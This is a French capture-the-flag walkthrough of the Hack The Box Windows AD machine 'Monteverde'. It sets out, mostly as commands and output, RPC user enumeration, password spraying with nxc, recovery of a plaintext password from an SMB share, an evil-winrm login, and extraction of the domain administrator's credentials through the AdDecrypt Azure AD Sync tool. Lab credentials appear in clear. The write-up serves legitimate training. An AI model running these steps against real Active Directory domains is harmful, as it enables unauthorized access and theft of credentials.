# Monteverde
`nxc` `azure` `rpc`
* Nom machine : Monteverde
* Difficulté : Moyenne
* OS : Windows - AD
## Enumération
### NMAP
```
Nmap scan report for 10.10.10.172
Host is up (0.031s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-10 18:30:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
```
### RPC
```
┌──(kali㉿kali)-[~/htb]
└─$ rpcclient 10.10.10.172 -N -U ''
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
```
Nous avons une liste d'user
## Accès initial
J'ai essayé à l'aide de nxc de bruteforce les mots de passe en reprenant la liste d'username...
```
┌──(kali㉿kali)-[~/htb/mond]
└─$ nxc smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success
{...}
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:SABatchJobs STATUS_LOGON_FAILURE
{...}
```
```
┌──(kali㉿kali)-[~/htb/mond]
└─$ nxc smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Enumerated shares
SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark
SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------
SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ
SMB 10.10.10.172 445 MONTEVERDE C$ Default share
SMB 10.10.10.172 445 MONTEVERDE E$ Default share
SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE users$ READ
```
Nous allons voir le contenu de users$
```
┌──(kali㉿kali)-[~/htb/mond]
└─$ smbclient //10.10.10.172/users$ -U SABatchJobs
Password for [WORKGROUP\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
smb: \> cd mhope
smb: \mhope\> dir
. D 0 Fri Jan 3 08:41:18 2020
.. D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020
31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> mget azure.xml
Get file azure.xml? yes
getting file \mhope\azure.xml of size 1212 as azure.xml (8.5 KiloBytes/sec) (average 8.5 KiloBytes/sec)
```
et surprise ...
```
┌──(kali㉿kali)-[~/htb/mond]
└─$ cat azure.xml
��
Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential
System.Object
Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential
2020-01-03T05:35:00.7562298-08:00
2054-01-03T05:35:00.7562298-08:00
00000000-0000-0000-0000-000000000000
4n0therD4y@n0th3r$
```
```
┌──(kali㉿kali)-[~/htb/mond]
└─$ evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami
megabank\mhope
```
## Elévation des privilèges
Nous faisons partis du groupe Azure admin
{% embed url="" %}
```
┌──(kali㉿kali)-[~/htb/monde]
└─$ wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
--2024-11-10 14:25:51-- https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241110%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241110T192551Z&X-Amz-Expires=300&X-Amz-Signature=539a62acf2153c8bc4b5187ff9366e9f8f8f007f2b1643fea4bea50c9e65cfe7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream [following]
--2024-11-10 14:25:51-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241110%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241110T192551Z&X-Amz-Expires=300&X-Amz-Signature=539a62acf2153c8bc4b5187ff9366e9f8f8f007f2b1643fea4bea50c9e65cfe7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 152818 (149K) [application/octet-stream]
Saving to: ‘AdDecrypt.zip’
AdDecrypt.zip 100%[===================================================================>] 149.24K --.-KB/s in 0.06s
2024-11-10 14:25:51 (2.54 MB/s) - ‘AdDecrypt.zip’ saved [152818/152818]
```
```
*Evil-WinRM* PS C:\Users\mhope\Documents> upload AdDecrypt.exe
Info: Uploading /home/kali/htb/monde/AdDecrypt.exe to C:\Users\mhope\Documents\AdDecrypt.exe
Data: 19796 bytes of 19796 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> upload mcrypt.dll
Info: Uploading /home/kali/htb/monde/mcrypt.dll to C:\Users\mhope\Documents\mcrypt.dll
Data: 445664 bytes of 445664 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> cd 'C:\Program Files\Microsoft Azure AD Sync\Bin'
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\AdDecrypt.ex
e -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
```